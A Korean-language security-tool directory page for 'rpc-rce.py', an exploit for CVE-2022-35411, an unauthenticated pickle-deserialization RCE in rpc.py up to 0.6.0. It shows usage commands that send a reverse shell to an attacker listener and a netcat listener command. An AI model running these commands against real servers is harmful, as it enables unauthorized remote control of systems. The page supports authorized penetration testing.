Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
rpc-rce.py — CVE-2022-35411 익스플로잇 — rpc.py (<= 0.6.0)에서의 인증되지 않은 RCE | Kitploit
도구/GitHubGitHub/cspanias/rpc-rce.py
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubcspanias/rpc-rce.py

rpc-rce.py

CVE-2022-35411 익스플로잇 — rpc.py (<= 0.6.0)에서의 인증되지 않은 RCE

저장소 보기
21년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

rpc.py RCE 익스플로잇 (CVE-2022-35411)

이는 CVE-2022-35411을 대상으로 하는 업데이트되고 개선된 익스플로잇으로, 취약한 버전의 rpc.py (<= 0.6.0)를 공격합니다.
Python pickle 역직렬화를 통해 **인증되지 않은 원격 코드 실행(RCE)**을 가능하게 합니다.

원본 익스플로잇 작성자: Elias Hohl
향상된 버전: x7331 - 사용성, 이식성 및 자동화 개선


취약점 요약

취약점은 rpc.py가 Python의 pickle 모듈을 안전하지 않게 사용하는 데 있으며, 조작된 페이로드가 인증 없이 임의 명령을 실행할 수 있도록 합니다.

  • CVE ID: CVE-2022-35411
  • 영향을 받는 버전: rpc.py v0.4.2 – v0.6.0
  • 익스플로잇 유형: 인증되지 않은 원격 코드 실행 (RCE)

변경 사항

  • ✅ argparse로 전환하여 --lhost, --lport, --target, --dry-run 플래그 지원
  • ✅ 깔끔하고 모듈화된 코드 구조
  • ✅ 선택적 리버스 셸 전달 (TCP Bash)
  • ✅ Curl 테스트 페이로드 (안전 모드)
  • ✅ 로깅 지원 및 더 깔끔한 출력
  • ✅ -h / --help를 통한 적절한 사용법 안내
  • ✅ 명확성을 위한 메타데이터 및 인라인 주석

사용법

리버스 셸 예제

root@kitploit:~
python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001

드라이 런 (셸 없음, curl 테스트만)

root@kitploit:~
python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001 --dry-run

사용자 지정 대상 (선택 사항)

root@kitploit:~
python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001 --target http://victim.internal:65432/sayhi

요구 사항

  • Python 3.x
  • requests 라이브러리 (pip install requests로 설치)
  • LHOST의 리스너 (예: nc -lvnp 9001)
  • 취약한 rpc.py 서버 실행 중

법적 및 윤리적 고지

이 익스플로잇은 교육 및 승인된 테스트 목적으로만 제공됩니다. 소유하지 않거나 명시적 테스트 허가가 없는 시스템에서는 사용하지 마십시오.

도구 다운로드